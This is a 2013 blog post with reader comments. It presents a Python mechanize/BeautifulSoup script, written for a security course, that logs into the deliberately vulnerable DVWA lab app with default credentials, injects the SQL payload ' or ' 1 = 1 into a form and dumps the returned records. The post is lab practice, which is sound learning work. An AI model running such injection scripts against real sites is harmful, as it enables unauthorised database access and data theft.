Sunday, February 24, 2013

SQLi with Python and DVWA: article 201304

Continuing on with my studies and practice of Python with the help of SecurityTube's SPSE course I am presenting below a Proof of Concept script for SQL Injection. They script is written in Python 2.7 and uses Mecahnize along with BeautifulSoup.  I ran the script against OWASP's Damn Vulnerable Web Application found on the Broken Web Apps VM.  I have commented the script the make it is self explanatory as possible

Here is a screen shot of the output:



Here is the script:

#!/usr/bin/python

#Bringing in mechanize and beautiful soup.  These are  installed separately from Python
import mechanize
from bs4 import BeautifulSoup

#Building the SQL injection
hotSQLinjection = "' or ' 1 = 1"

#Creating a mechanize browser
browser = mechanize.Browser()

#Opening my URI to the DVWA web page obviously your location will most likely vary
browser.open("http://192.168.1.152/dvwa")

#Printing to browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55 + "\n"

#There is only one form on this page so I jump right in
browser.select_form(nr=0)


#Below I am filling out the form fields and submitting for log in
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

#Again printing the browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55

#Now that I am authenticated I am opening the browser to the SQL Injection page
browser.open("http://192.168.1.152/dvwa/vulnerabilities/sqli")

#Again there is only one form so I am so I will jump right in

#Printing out what the SQLi is
print "\n"
print "#" *55
print "# " + " The SQL Injection that will be used is: " + hotSQLinjection
print "# " + " Injecting now"
print "#" *55

#Inserting the SQL Injection into the form filed and submitting
browser.select_form(nr=0)
browser.form['id'] = hotSQLinjection
browser.submit()

#This feeds the the browser page into a variable to feed into the BeautifulSoup parser
page1 =  browser.response().read()

#As it says!
print "\n"
print "#" *55
print "# " + " Feeding page into BeautifulSoup LXML Parser"
print "#" *55

soup1 = BeautifulSoup(page1, "lxml")

#The "sensitive" info from the injection is surrounded by
 tags
#This creates a list to iterate though
allPRE =  soup1.find_all('pre')

#Printing out the "sensitve" information from the DVWA database
print "\n"
print "#" *55
print "# " + " Dump of database"
print "#" *55

#Iterating through the list
for pre in allPRE:
    print pre

#All done
print "\n"
print "#" *55
print "# " + " Injection and dump complete"
print "#" *55
print "\n"

7 comments:

  1. Hi, it would be nice if you put a link to your code on pastebin or a similar page to keep the identation and order of the code.

    Thanks for the post, it encourages me more to keep coding in python.

    ReplyDelete
    Replies
    1. You are right. I have been lazy about that. I will set up a repository somewhere.

      Delete
    2. Here you go. This script and couple of others:
      https://bitbucket.org/whyJoseph/spse-whyjoseph/src

      Delete
  2. Thanks Joe - quick question. I am taking the course as well. I have modified my code with some of your suggestions. I am having a problem getting the page read and BS to parse. Any idea why that might be happening? I get logged in (had to change the credentials from what you had in your script) but cannot read or parse the page.

    Here is my output:
    #######################################################
    # Damn Vulnerable Web App (DVWA) - Login
    #######################################################

    #######################################################
    # Damn Vulnerable Web App (DVWA) v1.0.7 :: Welcome
    #######################################################


    #######################################################
    # The SQL Injection that will be used is: ' or ' 1 = 1
    # Injecting now
    #######################################################


    #######################################################
    # Feeding page into BeautifulSoup LXML Parser
    #######################################################


    #######################################################
    # Dump of database
    #######################################################


    #######################################################
    # Injection and dump complete
    #######################################################

    ReplyDelete
    Replies
    1. quick update - its not that the page isnt getting parsed. It appears that the SQLi in hotSQLinjection is not getting submitted...

      Delete
    2. My apologies for the delay. Do you have something similar to this in your script?

      #Inserting the SQL Injection into the form field and submitting
      browser.select_form(nr=0)
      browser.form['id'] = hotSQLinjection
      browser.submit()

      Delete
    3. In my case, it was helpful to lower down the security level of DVWA to "low" to meet this problem.

      Delete